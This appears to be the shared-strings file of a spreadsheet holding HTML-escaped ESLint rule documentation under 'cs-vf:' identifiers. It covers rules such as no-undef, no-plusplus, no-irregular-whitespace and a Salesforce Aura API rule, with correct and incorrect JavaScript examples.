id="typeof"&gt;typeof&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "typeof": false }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/\n\nif (typeof UndefinedIdentifier === "undefined") {\n    // do something ...\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;You can use this option if you want to prevent &lt;code&gt;typeof&lt;/code&gt; check on a variable which has not been declared.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "typeof": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: ["error", { "typeof": true }] */\n\nif(typeof a === "string"){}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "typeof": true }&lt;/code&gt; option with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*global a*/\n/*eslint no-undef: ["error", { "typeof": true }] */\n\nif(typeof a === "string"){}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="environments"&gt;Environments&lt;/h2&gt;\n&lt;p&gt;For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below.&lt;/p&gt;\n&lt;h3 id="browser"&gt;browser&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;browser&lt;/code&gt; environment:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/\n/*eslint-env browser*/\n\nsetTimeout(function() {\n    alert("Hello");\n});\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="nodejs"&gt;Node.js&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;node&lt;/code&gt; environment:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/\n/*eslint-env node*/\n\nvar fs = require("fs");\nmodule.exports = function() {\n    console.log(fs);\n};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If explicit declaration of global variables is not to your taste.&lt;/p&gt;\n&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;\n&lt;p&gt;This rule provides compatibility with treatment of global variables in &lt;a href="http://jshint.com/"&gt;JSHint&lt;/a&gt; and &lt;a href="http://www.jslint.com"&gt;JSLint&lt;/a&gt;.&lt;/p&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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mistake.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows control characters in regular expressions.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-control-regex: "error"*/\n\nvar pattern1 = /\x1f/;\nvar pattern2 = new RegExp("\x1f");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-control-regex: "error"*/\n\nvar pattern1 = /\x20/;\nvar pattern2 = new RegExp("\x20");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you need to use control character pattern matching, then you should turn this rule off.&lt;/p&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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on.\nSince there is no &lt;code&gt;arguments&lt;/code&gt; object to offer alternative access to this data, assignment of the parameter is absolutely destructive.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows reassigning exceptions in &lt;code&gt;catch&lt;/code&gt; clauses.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-ex-assign: "error"*/\n\ntry {\n    // code\n} catch (e) {\n    e = 10;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-ex-assign: "error"*/\n\ntry {\n    // code\n} catch (e) {\n    var foo = 10;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://bocoup.com/blog/the-catch-with-try-catch"&gt;The "catch" with try…catch&lt;/a&gt; by Ben Alman explains how the exception identifier can leak into the outer scope in IE 6-8&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;code&gt;javascript:&lt;/code&gt;.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-script-url: "error"*/\n\nlocation.href = "javascript:void(0)";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;JSHint&lt;/strong&gt;: This rule corresponds to &lt;code&gt;scripturl&lt;/code&gt; rule of JSHint.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://stackoverflow.com/questions/13497971/what-is-the-matter-with-script-targeted-urls"&gt;What is the matter with script-targeted URLs?&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-plusplus</t>
  </si>
  <si>
    <t>disallow the unary operators `++` and `--`</t>
  </si>
  <si>
    <t>&lt;p&gt;Because the unary &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; operators are subject to automatic semicolon insertion, differences in whitespace can change semantics of source code.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 10;\nvar j = 20;\n\ni ++\nj\n// i = 11, j = 20\n&lt;/code&gt;&lt;/pre&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 10;\nvar j = 20;\n\ni\n++\nj\n// i = 10, j = 21\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows the unary operators &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: "error"*/\n\nvar foo = 0;\nfoo++;\n\nvar bar = 42;\nbar--;\n\nfor (i = 0; i &lt; l; i++) {\n    return;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: "error"*/\n\nvar foo = 0;\nfoo += 1;\n\nvar bar = 42;\nbar -= 1;\n\nfor (i = 0; i &lt; l; i += 1) {\n    return;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option.&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"allowForLoopAfterthoughts": true&lt;/code&gt; allows unary operators &lt;code&gt;++&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; in the afterthought (final expression) of a &lt;code&gt;for&lt;/code&gt; loop.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="allowforloopafterthoughts"&gt;allowForLoopAfterthoughts&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowForLoopAfterthoughts": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-plusplus: ["error", { "allowForLoopAfterthoughts": true }]*/\n\nfor (i = 0; i &lt; l; i++) {\n    return;\n}\n\nfor (i = 0; i &lt; l; i--) {\n    return;\n}\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-sparse-arrays</t>
  </si>
  <si>
    <t>disallow sparse arrays</t>
  </si>
  <si>
    <t>&lt;p&gt;Sparse arrays contain empty slots, most frequently due to multiple commas being used in an array literal, such as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var items = [,,];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;While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following:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var colors = [ "red",, "blue" ];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;In this example, the &lt;code&gt;colors&lt;/code&gt; array has a &lt;code&gt;length&lt;/code&gt; of 3. But did the developer intend for there to be an empty spot in the middle of the array? Or is it a typo?&lt;/p&gt;\n&lt;p&gt;The confusion around sparse arrays defined in this manner is enough that it's recommended to avoid using them unless you are certain that they are useful in your code.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows sparse array literals which have "holes" where commas are not preceded by elements. It does not apply to a trailing comma following the last element.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-sparse-arrays: "error"*/\n\nvar items = [,];\nvar colors = [ "red",, "blue" ];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-sparse-arrays: "error"*/\n\nvar items = [];\nvar items = new Array(23);\n\n// trailing comma (after the last element) is not a problem\nvar colors = [ "red", "blue", ];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to use sparse arrays, then it is safe to disable this rule.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://www.nczonline.net/blog/2007/09/09/inconsistent-array-literals/"&gt;Inconsistent array literals&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var boundGetName = (function getName() {\n    return this.name;\n}).bind({ name: "ESLint" });\n\nconsole.log(boundGetName());      // "ESLint"\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;This code is an example of a good use of &lt;code&gt;bind()&lt;/code&gt; for setting the value of &lt;code&gt;this&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Sometimes during the course of code maintenance, the &lt;code&gt;this&lt;/code&gt; value is removed from the function body. In that case, you can end up with a call to &lt;code&gt;bind()&lt;/code&gt; that doesn't accomplish anything:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;// useless bind\nvar boundGetName = (function getName() {\n    return "ESLint";\n}).bind({ name: "ESLint" });\n\nconsole.log(boundGetName());      // "ESLint"\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;In this code, the reference to &lt;code&gt;this&lt;/code&gt; has been removed but &lt;code&gt;bind()&lt;/code&gt; is still used. In this case, the &lt;code&gt;bind()&lt;/code&gt; is unnecessary overhead (and a performance hit) and can be safely removed.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This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binding.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Arrow functions can never have their &lt;code&gt;this&lt;/code&gt; value set using &lt;code&gt;bind()&lt;/code&gt;. This rule flags all uses of &lt;code&gt;bind()&lt;/code&gt; with arrow functions as a problem&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/\n/*eslint-env es6*/\n\nvar x = function () {\n    foo();\n}.bind(bar);\n\nvar x = (() =&gt; {\n    foo();\n}).bind(bar);\n\nvar x = (() =&gt; {\n    this.foo();\n}).bind(bar);\n\nvar x = function () {\n    (function () {\n      this.foo();\n    }());\n}.bind(bar);\n\nvar x = function () {\n    function foo() {\n      this.bar();\n    }\n}.bind(baz);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/\n\nvar x = function () {\n    this.foo();\n}.bind(bar);\n\nvar x = function (a) {\n    return a + 1;\n}.bind(foo, bar);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you are not concerned about unnecessary calls to &lt;code&gt;bind()&lt;/code&gt;, you can safely disable this rule.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/bind"&gt;Function.prototype.bind&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://www.smashingmagazine.com/2014/01/understanding-javascript-function-prototype-bind/"&gt;Understanding JavaScript's Function.prototype.bind&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-octal-escape</t>
  </si>
  <si>
    <t>disallow octal escape sequences in string literals</t>
  </si>
  <si>
    <t>&lt;p&gt;As of the ECMAScript 5 specification, octal escape sequences in string literals are deprecated and should not be used. Unicode escape sequences should be used instead.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var foo = "Copyright \251";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows octal escape sequences in string literals.&lt;/p&gt;\n&lt;p&gt;If ESLint parses code in strict mode, the parser (instead of this rule) reports the error.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-octal-escape: "error"*/\n\nvar foo = "Copyright \251";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-octal-escape: "error"*/\n\nvar foo = "Copyright \u00A9";   // unicode\n\nvar foo = "Copyright \xA9";     // hexadecimal\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:aura-api</t>
  </si>
  <si>
    <t>validate Aura API</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that the Aura API is used according to the documentation. It disallows private and undocumented features.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;p&gt;Standard Lightning Component Framework features.&lt;/p&gt;&lt;/li&gt;\n&lt;li&gt;&lt;p&gt;Standard Javascript features.&lt;/p&gt;&lt;/li&gt;\n&lt;li&gt;&lt;p&gt;Standard Locker Service SecureObject object features. &lt;/p&gt;\n&lt;p&gt;For details of all of the permitted methods in the framework, including $A, see the JavaScript API at https://myDomain.lightning.force.com/auradocs/reference.app, where myDomain is the name of your custom Salesforce domain.&lt;/p&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;Aura.notGreat(); // Use $A instead of Aura\n$A.util.notUtil(); // $A.util does not contain notUtil\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;$A.createComponent("aura:text",{value:'Hello World'}, function(auraTextComponent, status, statusMessagesList){\n     // auraTextComponent is an instance of aura:text containing the value Hello World\n});\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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clear.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var person = new Person;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule requires parentheses when invoking a constructor with no arguments using the &lt;code&gt;new&lt;/code&gt; keyword in order to increase code clarity.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint new-parens: "error"*/\n\nvar person = new Person;\nvar person = new (Person);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint new-parens: "error"*/\n\nvar person = new Person();\nvar person = new (Person)();\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var _foo;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;There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objects.&lt;/p&gt;\n&lt;p&gt;Whether or not you choose to allow dangling underscores in identifiers is purely a convention and has no effect on performance, readability, or complexity. It's purely a preference.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows dangling underscores in identifiers.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: "error"*/\n\nvar foo_;\nvar __proto__ = {};\nfoo._bar();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: "error"*/\n\nvar _ = require('underscore');\nvar obj = _.contains(items, item);\nobj.__proto__ = {};\nvar file = __filename;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"allow"&lt;/code&gt; allows specified identifiers to have dangling underscores&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"allowAfterThis": false&lt;/code&gt; (default) disallows dangling underscores in members of the &lt;code&gt;this&lt;/code&gt; object&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"allowAfterSuper": false&lt;/code&gt; (default) disallows dangling underscores in members of the &lt;code&gt;super&lt;/code&gt; object&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"enforceInMethodNames": false&lt;/code&gt; (default) allows dangling underscores in method names&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="allow"&gt;allow&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allow": ["foo_", "_bar"] }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allow": ["foo_", "_bar"] }]*/\n\nvar foo_;\nfoo._bar();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowafterthis"&gt;allowAfterThis&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowAfterThis": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allowAfterThis": true }]*/\n\nvar a = this.foo_;\nthis._bar();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowaftersuper"&gt;allowAfterSuper&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowAfterSuper": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allowAfterSuper": true }]*/\n\nvar a = super.foo_;\nsuper._bar();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="enforceinmethodnames"&gt;enforceInMethodNames&lt;/h3&gt;\n&lt;p&gt;Examples of incorrect code for this rule with the &lt;code&gt;{ "enforceInMethodNames": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "enforceInMethodNames": true }]*/\n\nclass Foo {\n  _bar() {}\n}\n\nclass Foo {\n  bar_() {}\n}\n\nconst o = {\n  _bar() {}\n};\n\nconst o = {\n  bar_() = {}\n};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow dangling underscores in identifiers, then you can safely turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-irregular-whitespace</t>
  </si>
  <si>
    <t>disallow irregular whitespace outside of strings and comments</t>
  </si>
  <si>
    <t>&lt;p&gt;Invalid or irregular whitespace causes issues with ECMAScript 5 parsers and also makes code harder to debug in a similar nature to mixed tabs and spaces.&lt;/p&gt;\n&lt;p&gt;Various whitespace characters can be inputted by programmers by mistake for example from copying or keyboard shortcuts. Pressing Alt + Space on macOS adds in a non breaking space character for example.&lt;/p&gt;\n&lt;p&gt;Known issues these spaces cause:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Zero Width Space&lt;ul&gt;\n&lt;li&gt;Is NOT considered a separator for tokens and is often parsed as an &lt;code&gt;Unexpected token ILLEGAL&lt;/code&gt;&lt;/li&gt;\n&lt;li&gt;Is NOT shown in modern browsers making code repository software expected to resolve the visualization&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;\n&lt;li&gt;Line Separator&lt;ul&gt;\n&lt;li&gt;Is NOT a valid character within JSON which would cause parse errors&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at catching invalid whitespace that is not a normal tab and space. Some of these characters may cause issues in modern browsers and others will be a debugging issue to spot.&lt;/p&gt;\n&lt;p&gt;This rule disallows the following characters except where the options allow:&lt;/p&gt;\n&lt;pre&gt;&lt;code&gt;\u000B - Line Tabulation (\v) - &lt;VT&gt;\n\u000C - Form Feed (\f) - &lt;FF&gt;\n\u00A0 - No-Break Space - &lt;NBSP&gt;\n\u0085 - Next Line\n\u1680 - Ogham Space Mark\n\u180E - Mongolian Vowel Separator - &lt;MVS&gt;\n\ufeff - Zero Width No-Break Space - &lt;BOM&gt;\n\u2000 - En Quad\n\u2001 - Em Quad\n\u2002 - En Space - &lt;ENSP&gt;\n\u2003 - Em Space - &lt;EMSP&gt;\n\u2004 - Tree-Per-Em\n\u2005 - Four-Per-Em\n\u2006 - Six-Per-Em\n\u2007 - Figure Space\n\u2008 - Punctuation Space - &lt;PUNCSP&gt;\n\u2009 - Thin Space\n\u200A - Hair Space\n\u200B - Zero Width Space - &lt;ZWSP&gt;\n\u2028 - Line Separator\n\u2029 - Paragraph Separator\n\u202F - Narrow No-Break Space\n\u205f - Medium Mathematical Space\n\u3000 - Ideographic Space\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"skipStrings": true&lt;/code&gt; (default) allows any whitespace characters in string literals&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipComments": true&lt;/code&gt; allows any whitespace characters in comments&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipRegExps": true&lt;/code&gt; allows any whitespace characters in regular expression literals&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipTemplates": true&lt;/code&gt; allows any whitespace characters in template literals&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="skipstrings"&gt;skipStrings&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/\n\nfunction thing() /*&lt;NBSP&gt;*/{\n    return 'test';\n}\n\nfunction thing( /*&lt;NBSP&gt;*/){\n    return 'test';\n}\n\nfunction thing /*&lt;NBSP&gt;*/(){\n    return 'test';\n}\n\nfunction thing᠎/*&lt;MVS&gt;*/(){\n    return 'test';\n}\n\nfunction thing() {\n    return 'test'; /*&lt;ENSP&gt;*/\n}\n\nfunction thing() {\n    return 'test'; /*&lt;NBSP&gt;*/\n}\n\nfunction thing() {\n    // Description &lt;NBSP&gt;: some descriptive text\n}\n\n/*\nDescription &lt;NBSP&gt;: some descriptive text\n*/\n\nfunction thing() {\n    return / &lt;NBSP&gt;regexp/;\n}\n\n/*eslint-env es6*/\nfunction thing() {\n    return `template &lt;NBSP&gt;string`;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/\n\nfunction thing() {\n    return ' &lt;NBSP&gt;thing';\n}\n\nfunction thing() {\n    return '​&lt;ZWSP&gt;thing';\n}\n\nfunction thing() {\n    return 'th &lt;NBSP&gt;ing';\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skipcomments"&gt;skipComments&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipComments": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipComments": true }]*/\n\nfunction thing() {\n    // Description &lt;NBSP&gt;: some descriptive text\n}\n\n/*\nDescription &lt;NBSP&gt;: some descriptive text\n*/\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skipregexps"&gt;skipRegExps&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipRegExps": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipRegExps": true }]*/\n\nfunction thing() {\n    return / &lt;NBSP&gt;regexp/;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="skiptemplates"&gt;skipTemplates&lt;/h3&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipTemplates": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipTemplates": true }]*/\n/*eslint-env es6*/\n\nfunction thing() {\n    return `template &lt;NBSP&gt;string`;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you decide that you wish to use whitespace other than tabs and spaces outside of strings in your application.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;[ECMA whitespace](https://es5.github.io/#x7.2 \xA0)&lt;/li&gt;\n&lt;li&gt;&lt;a href="http://timelessrepo.com/json-isnt-a-javascript-subset"&gt;JSON whitespace issues&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-new-object</t>
  </si>
  <si>
    <t>disallow `Object` constructors</t>
  </si>
  <si>
